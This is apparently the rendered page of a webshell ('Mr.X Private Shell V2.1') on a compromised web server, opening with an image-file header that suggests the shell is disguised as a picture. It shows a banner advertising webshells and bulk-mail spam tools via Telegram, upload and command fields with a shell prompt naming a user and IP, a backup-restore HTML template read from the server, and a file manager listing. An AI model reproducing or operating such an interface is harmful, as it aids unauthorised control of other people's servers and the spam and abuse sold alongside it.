����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
<div class="row">
    <div class="col-md-6">
        <h2>{{lang.t("Items To Restore")}}</h2>
        <p>{{lang.t("The following items will be restored. you can use the \"Remove items\" button to remove them all from the restore process or click cancel to rearrange the items you want to restore")}}</p>
        <div class="row">
            <div class="col-md-4" ng-repeat="(contains, items) in list_checked">
                <div style="padding: 10px; margin-bottom: 15px; border: 1px solid #ddd;">
                    <h5 style="margin-bottom: 0; font-size: 14px; font-weight: bold;">{{const.BACKUP_TYPE_ACCOUNT_NAMES[contains]}}</h5>
                    {{lang.t("%s items", items.length)}}
                    <span class="fas fa-question-circle" uib-tooltip-template="'itemsList.htm'" tooltip-placement="auto" tooltip-class="backups-tooltip"></span>
                    <div><a href="" ng-click="removeItems(contains)" style="color: #cc0000"><span class="fas fa-times"></span> {{lang.t("Remove items")}}</a></div>
                </div>
            </div>
            <div class="col-md-4" ng-repeat="contains in noPermissions">
                <div style="padding: 10px; margin-bottom: 15px; border: 1px solid #ddd; color: #B6B6B6; background: #f4f4f4;">
                    <h5 style="margin-bottom: 0; font-size: 14px; font-weight: bold;">{{const.BACKUP_TYPE_ACCOUNT_NAMES[contains]}}</h5>
                    {{lang.t("%s items", 0)}}
                    <div>{{lang.t("No Permissions")}}</div>
                </div>
            </div>
        </div>
    </div>
    <div class="col-md-6">
        <div ng-show="gotItems([const.BACKUP_TYPE_ACCOUNT_HOMEDIR,const.BACKUP_TYPE_ACCOUNT_EMAILS])">
            <h2>{{lang.t("Restore Options")}}</h2>
            <div>
                <div class="pretty p-default p-curve p-smooth" tooltip="right|This option preserves existing live account data and merges with the selected backup.">
                    <input type="checkbox" ng-model="options.merge" id="merge" ng-checked="options.merge" />
                    <div class="state p-primary"><label for="merge">{{ lang.t("Merge backup data with live account data") }} <span class="fas fa-info-circle" style="display: inline;"></span></label></div>
                </div>
            </div>
        </div>
        <div ng-show="restore_conditions.length">
            <h2>{{lang.t("Restore Conditions")}}</h2>

            <div ng-repeat="condition in restore_conditions">
                <div class="pretty p-default p-curve p-smooth">
                    <input type="checkbox" ng-model="conditions[condition._id]" id="condition_{{condition._id}}" ng-checked="conditions[condition._id]" />
                    <div class="state p-primary"><label for="condition_{{condition._id}}">{{ condition.condition }}</label></div>
                </div>
            </div>
        </div>
        <div ng-show="askForEncryptionKey()">
            <h2>{{lang.t("Backups Private Encryption Key")}}</h2>
            <input type="text" class="form-control" ng-model="encryption.key" placeholder="{{lang.t('Paste your backups private encryption key in order to restore the selected items')}}" value="" />
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
restore Folder 0755
backups.htm File 1.47 KB 0644
backupsDownloadSummary.htm File 1.73 KB 0644
backupsRestoreSummary.htm File 3.15 KB 0644
dashboard.htm File 4.71 KB 0644
restore.htm File 1 KB 0644
rootActionRequired.htm File 312 B 0644